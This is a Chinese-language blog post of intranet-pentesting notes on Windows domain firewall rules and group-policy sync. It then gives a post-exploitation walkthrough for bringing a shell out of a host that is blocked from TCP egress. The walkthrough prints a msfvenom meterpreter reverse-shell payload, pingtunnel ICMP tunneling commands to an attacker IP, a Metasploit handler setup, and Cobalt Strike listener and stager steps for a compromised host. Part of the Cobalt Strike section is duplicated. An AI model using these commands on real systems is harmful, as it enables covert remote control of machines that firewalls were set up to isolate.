域防火墙&入站出站规则&不出网隧道上线

最新推荐文章于 2024-05-10 17:49:50 发布
最新推荐文章于 2024-05-10 17:49:50 发布
阅读量1.1k 收藏 1
点赞数
分类专栏: 内网学习 文章标签: 网络 tcp/ip 服务器
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/kui576/article/details/126911504
版权

内网安全-域防火墙&入站出站规则&不出网隧道上线&组策略对象同步

在这里插入图片描述

#单机-防火墙-限制端口出入站

熟悉常见主机配置不出网的方式

1、入站&出站&连接安全

2、域&专用&公网&状态

3、阻止&允许&其他配置

入站:外部网络访问你的服务端

出站:你的服务端去请求别人的服务端

#单机-防火墙-限制协议出入站

熟悉常见主机配置不出网的方式

1、程序&端口&预定义&自定义

2、协议&TCP&UDP&ICMP&L2TP等

在这里插入图片描述

协议参考链接:https://www.cnblogs.com/fzz9/p/8964513.html

#域控-防火墙-组策略对象同步

熟悉常见主机配置不出网的操作流程

操作:组策略管理-域-创建GPO链接-防火墙设置

更新策略:强制&命令&重启

命令:gpupdate/force

#域控-防火墙-组策略不出网上线(后渗透)

背景介绍:域控通过组策略设置防火墙规则同步后,域内用户主机被限制TCP出网,其中规则为出站规则,安全研究者通过入站取得SHELL权限,需要对其进行上线控制。

思路:正向连接&隧道技术

如果是入站被限制呢?反向连接&隧道技术也可以解决(前提看限制的多不多)

1、MSF上线

应为入站限制严重(不出网)

设置反向连接的后门连接本地的3333端口

在这里插入图片描述

msfvenom -p windows/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=3333 -f exe > d.exe

windows主机用工具把传输的tcp协议数据转为icmp协议数据(向下兼容)进行传输到攻击主机的特定端口(你设置的监听端口)

将本地3333 icmp协议数据转发至攻击者ip的4444流量上(管理员运行)

在这里插入图片描述

pingtunnel.exe -type client -l 127.0.0.1:3333 -s (攻击主机ip) -t (攻击主机ip):4444 -tcp 1 -noprint 1 -nolog 1

msf启用监听本地的特定端口(你自己设置的那个)

在这里插入图片描述

msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 0.0.0.0
set lport 4444
exploit

linux运行工具把传输过来的icmp协议数据重新转化为tcp协议数据

Kali开启隧道:

./pingtunnel -type server

在这里插入图片描述

大家可以虚拟机试一下0.0
在这里插入图片描述

2、CS-ICMP-上线

VPS:

./pingtunnel -type server

肉鸡:(管理器运行)

pingtunnel.exe -type client -l 127.0.0.1:6666 -s 192.168.46.66 -t 192.168.55.77:7777 -tcp 1 -noprint 1 -nolog 1

CS:

监听器1:127.0.0.1 6666

监听器2:192.168.55.77 7777

生成监听器1的Stager后门肉鸡执行
.46.66 -t 192.168.55.77:7777 -tcp 1 -noprint 1 -nolog 1

CS:

监听器1:127.0.0.1 6666

监听器2:192.168.55.77 7777

生成监听器1的Stager后门肉鸡执行

kui954
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
AD防火墙开启端口
11-17
AD控开启防火墙后,会造成客户端无法访问现象。 所以需要开启一些对应端口。
防火墙出站入站
weixin_58782362的博客
09-22 3237
判断防火墙是否阻止出站入站的方法:直接将两个木马放到目标主机上面去。利用ssh建立隧道,必须要有一个跳板机,且这个跳板机必须是linux。反向木马连接,就是等于出站规则,cs中的reverse_tcp。正向木马连接,就是等于入站规则,cs中的bind_tcp。建立隧道是通过出站建立的,并不受防火墙限制,同时是dns。出站入站本身就是以自己为中心。出站就是指,我去访问互联入站就是指,互联来访问我;
2、内安全-防火墙-入站出站规则-不出隧道上线-组策略对象同步
m0_59598029的博客
03-26 1554
用途:个人在线笔记,有所借鉴,欢迎指正隧道技术:解决不出协议上线的问题(利用出协议进行封装出)代理技术:解决网络通讯不通的问题(利用跳板机建立节点后续操作)
防火墙及工作模式
weixin_42283438的博客
04-23 3910
(zone)是防火墙上的重要概念,防火墙通常放置在网络的边界,路由器通过接口来连接不同段,防火墙则通过来表示不同的网络。 安全策略:通过将接口加并且在安全区之间启动安全检查,从而对流经不同安全区的信息流进行安全过滤。常用的安全检查包括基于ACL和应用层状态的检查, 华为防火墙默认有5个安全区,并且每个安全区均设置了安全优先级。分别是: (1)虚拟区(Vzone)是虚拟防火墙所支持的区,安全优先级为0; (2)非受信区(Untrust)是低级的安全区,其安全优先级为5; (3)非
渗透-防火墙+入站出站规则+组策略对象同步+不出隧道上线
xiaoheizi的博客
11-02 935
5.限制协议:在来到出站规则——右键 新建规则 ——端口——选择 TCP和所有端口——阻止连接——选择 ——名字:TCP协议控制。2.因为使用的是reverse监听器方式,所以是出站,使用的是9527端口。如果目标主机的出站规则TCP协议被封杀,入站规则没有封杀,有互联网络。3.fhq处右键——编辑——来到 高级安全 windows 防火墙——右键 属性。1.查看一台内主机的防火墙状态,和专用网络是开启状态,公用网络关闭状态。4.我们配置为:——启用 专用和公用——关闭。
【内安全】 防火墙&入站出站规则&不出隧道上线&组策略对象同步
今天是几号的博客
03-12 1527
代理:流量转发至跳板机,可以是服务器或者肉鸡,最主要的特征是,无论代理后面挂了几个设备,代理对外只表现为一个设备。隧道:是通过特定的通讯方法,直接找到这个目标reverse_tcp:反向 后门主动连接自己服务器 目标防火墙 出bind_tcp:正向 自己服务器主动连接后门 目标防火墙
windows入站规则设置(端口禁用、启用)
08-22
windows入站规则设置(端口禁用、启用),可以自定义设置windows防火墙入站规则,可以设置端口禁用或启用,特别是国企要求个人电脑禁用一些危险端口。工具简单易用,已添加常见禁用端口,直接点击添加禁用规则即可。
防火墙添加新的端口入站规则.bat
08-26
自动添加防火墙规则,双击运行输端口即可
防火墙入站出站,简单设置.doc
11-18
防火墙入站出站,简单设置.doc
Nmap绕过防火墙&脚本的使用.zip
09-16
Nmap绕过防火墙&脚本的使用.zip
C# 设置防火墙的创建规则
01-19
这时候,需要使用到防火墙里面的“高级设置”,创建某些特定的入站或者出栈规则,以规避其程序使用允许端口等意外的信息。  下面以创建出站规则为例,编写一条出站规则,规避除允许规则以外的通过防火墙。创建规则...
WINDOWS 2003 SP2控制器防火墙配置
07-22
如果成员需要跨防火墙控联系,加中,需要开放哪些策略。
控制器与防火墙
aiya11的专栏
12-12 1208
转帖:控制器防火墙控制器防火墙。我的Windows server 2003 控制器想启用windows的防火墙,可否照如何为控制器配置 Windows Server2003SP 防火墙 中的方法去做.    a Windows 防火墙保护所有网络连接 - 启用:    b Windows 防火墙 (启用端口 135 和 445 其中都进行控制器需要) 允许远程管理例外 - 启用:  
第123天:内安全-防火墙-入站出站规则-不出隧道上线-组策略对象同步
wuqingsix的博客
02-20 577
隧道技术:解决不出协议上线的问题(利用出协议进行封装出)-代理技术:解决网络通讯不通的问题(利用跳板机建立节点后续操作)-防火墙配置的学习理解出站入站规则的区别,及控同步设置出站规则:是设置防火墙的主机对外连接的规则,一般来说较为宽松入站规则:是外部访问部署防火墙主机时需要遵守的规则,一般较为严谨设置规则也可以分为对本地的应用程序 对协议 对端口进行完全自定义设置当控DC设置了防火墙策略后,可以在控机器的组策略管理器新建策略。
使用组策略及脚本统一配置防火墙
weixin_33947521的博客
04-13 1522
使用组策略/脚本统一配置防火墙 目前企业内多为环境,部分企业应用例如***检测等需要客户端统一开放某一端口比如Ping,如果企业环境较大,客户端数千个逐个设置将是浪费工作效率且不灵活的方案;所以可以通过使用策略来统一设置; 统一配置可以通过策略中自带的防火墙模板来设置,也可以通过使用bat脚本来配置,下面即分别演示配置方法; 1 组策略统一配置防火墙 使用...
控环境下开启防火墙
qq_42890862的博客
01-05 1830
1、 在服务器上,打开注册表 2、 在注册表内找到HKEY_LOCAL_MACHINE \ SOFTWARE \ Policies \ Microsoft \ WindowsFirewall,将其删除(删除前记得备份,防止出问题时还原) 3、重启防火墙服务(点击管理) 4、 此时可以开启防火墙 ...
Rust - TCP Server
Ez Lake
05-09 615
内容来自:软件工艺师 - Rust Web 全栈开发教程【完结】修改文件 tcpserver – src –修改文件 tcpclient – src –伊织 2024-05-09(四)凌晨。删掉原来的内容,配置。
ipv4手动设置网络的相关知识
m0_57692904的博客
05-10 271
作用:告诉计算机哪些是网络号,哪些是主机号。组合表示方式:192.168.1.1/(又称:主机号和网络号组成)2.家庭网络基础组成。
以太网络变压器型号
最新发布
Hqst88888的博客
05-10 291
额定电流:表示变压器的额定输和输出电流,通常以毫安(mA)为单位。额定电压:表示变压器的额定输和输出电压,通常以伏特(V)为单位。额定功率:表示变压器的额定输和输出功率,通常以瓦特(W)为单位。外形尺寸:表示变压器的外形尺寸,通常以长、宽、高(mm)为单位。环境温度:表示变压器的工作环境温度,通常以摄氏度(℃)为单位。端子类型:表示变压器的端子类型,通常有SMD、THT等类型。绝缘等级:表示变压器的绝缘等级,通常以等级符号表示。0℃~+70℃表示工作环境温度范围为0℃至+70℃;
防火墙出站规则入站规则的区别
03-11
出站规则入站规则防火墙中的两种不同的规则出站规则是指防火墙对从内部网络流向外部网络的数据流进行过滤和控制的规则,而入站规则则是指防火墙对从外部网络流向内部网络的数据流进行过滤和控制的规则出站...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

kui954

感谢各位的支持o(* ̄3 ̄)o

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值